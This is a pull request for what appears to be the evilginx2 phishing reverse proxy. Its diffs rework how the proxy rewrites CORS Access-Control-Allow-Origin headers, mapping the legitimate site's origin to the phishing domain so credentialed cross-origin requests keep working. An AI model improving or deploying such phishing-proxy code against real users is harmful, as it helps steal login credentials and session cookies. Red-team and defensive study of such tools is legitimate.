### PR TITLE
fix CORS issue

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -618,7 +618,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 					final_url := scheme + "//" + r_origin
 					if (ok){
 						resp.Header.Set("Access-Control-Allow-Origin", final_url)
-						resp.Header.Set("Access-Control-Allow-Credentials", "true")
 					}else{
 						resp.Header.Set("Access-Control-Allow-Origin", "*")
 					}

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -607,17 +607,14 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 			allow_origin := resp.Header.Get("Access-Control-Allow-Origin")
 			if allow_origin != "" && allow_origin != "*" {
-				origin_from_request := resp.Request.Header.Get("Origin")
-				if origin_from_request != "" {
-					scheme_origin := strings.Split(origin_from_request, "//")
-					r_origin, ok := p.replaceHostWithPhished(scheme_origin[1])
-					if ok {
-						scheme := scheme_origin[0]
-						final_url := scheme + "//" + r_origin
-						resp.Header.Set("Access-Control-Allow-Origin", final_url)
-					} else {
-						log.Important("Unable to translate %s, in the Access-Control-Allow-Origin header. Leaving it as it is.", origin_from_request)
-					}
+				scheme_origin := strings.Split(allow_origin, "//")
+				r_origin, ok := p.replaceHostWithPhished(scheme_origin[1])
+				if ok {
+					scheme := scheme_origin[0]
+					final_url := scheme + "//" + r_origin
+					resp.Header.Set("Access-Control-Allow-Origin", final_url)
+				} else {
+					log.Important("Unable to translate %s, in the Access-Control-Allow-Origin header. Leaving it as it is.", allow_origin)
 				}
 			}
 			var rm_headers = []string{

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -606,19 +606,20 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 			}
 
 			allow_origin := resp.Header.Get("Access-Control-Allow-Origin")
-			if allow_origin != "" {
+			if allow_origin != "" && allow_origin != "*" {
 
 				origin_from_request := resp.Request.Header.Get("Origin")
-				if (origin_from_request == ""){
+				if origin_from_request == "" {
 					resp.Header.Set("Access-Control-Allow-Origin", "*")
-				}else{
+				} else {
 					scheme_origin := strings.Split(origin_from_request, "//")
 					r_origin, ok := p.replaceHostWithPhished(scheme_origin[1])
-					if (ok){
+					if ok {
 						scheme := scheme_origin[0]
 						final_url := scheme + "//" + r_origin
 						resp.Header.Set("Access-Control-Allow-Origin", final_url)
-					}else{
+					} else {
+						log.Important("Unable to translate %s, using '*' in the ACAO header.", origin_from_request)
 						resp.Header.Set("Access-Control-Allow-Origin", "*")
 					}
 				}

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -607,11 +607,8 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 			allow_origin := resp.Header.Get("Access-Control-Allow-Origin")
 			if allow_origin != "" && allow_origin != "*" {
-
 				origin_from_request := resp.Request.Header.Get("Origin")
-				if origin_from_request == "" {
-					resp.Header.Set("Access-Control-Allow-Origin", "*")
-				} else {
+				if origin_from_request != "" {
 					scheme_origin := strings.Split(origin_from_request, "//")
 					r_origin, ok := p.replaceHostWithPhished(scheme_origin[1])
 					if ok {
@@ -619,8 +616,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						final_url := scheme + "//" + r_origin
 						resp.Header.Set("Access-Control-Allow-Origin", final_url)
 					} else {
-						log.Important("Unable to translate %s, using '*' in the ACAO header.", origin_from_request)
-						resp.Header.Set("Access-Control-Allow-Origin", "*")
+						log.Important("Unable to translate %s, in the Access-Control-Allow-Origin header. Leaving it as it is.", origin_from_request)
 					}
 				}
 			}

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -614,9 +614,9 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				}else{
 					scheme_origin := strings.Split(origin_from_request, "//")
 					r_origin, ok := p.replaceHostWithPhished(scheme_origin[1])
-					scheme := scheme_origin[0]
-					final_url := scheme + "//" + r_origin
 					if (ok){
+						scheme := scheme_origin[0]
+						final_url := scheme + "//" + r_origin
 						resp.Header.Set("Access-Control-Allow-Origin", final_url)
 					}else{
 						resp.Header.Set("Access-Control-Allow-Origin", "*")

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -607,8 +607,22 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 			allow_origin := resp.Header.Get("Access-Control-Allow-Origin")
 			if allow_origin != "" {
-				resp.Header.Set("Access-Control-Allow-Origin", "*")
-				resp.Header.Set("Access-Control-Allow-Credentials", "true")
+
+				origin_from_request := resp.Request.Header.Get("Origin")
+				if (origin_from_request == ""){
+					resp.Header.Set("Access-Control-Allow-Origin", "*")
+				}else{
+					scheme_origin := strings.Split(origin_from_request, "//")
+					r_origin, ok := p.replaceHostWithPhished(scheme_origin[1])
+					scheme := scheme_origin[0]
+					final_url := scheme + "//" + r_origin
+					if (ok){
+						resp.Header.Set("Access-Control-Allow-Origin", final_url)
+						resp.Header.Set("Access-Control-Allow-Credentials", "true")
+					}else{
+						resp.Header.Set("Access-Control-Allow-Origin", "*")
+					}
+				}
 			}
 			var rm_headers = []string{
 				"Content-Security-Policy",


### PR DESCRIPTION
If `domain-X` makes a request with cookies to `domain-Y`, it will be able to read the response.

this PR solves [this](https://github.com/kgretzky/evilginx2/issues/500) issue.

It basically replaces:
```
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
```
with:
```
Access-Control-Allow-Origin: https://domain-X
Access-Control-Allow-Credentials: true
```
in the response of `domain-Y`

Note:
We don't modify the `Access-Control-Allow-Credentials` header, because we don't want to change the normal behavior of the page.  
If the ACAO header includes a domain (and not '*'), and we can translate it, we update it, otherwise, we leave as it is.
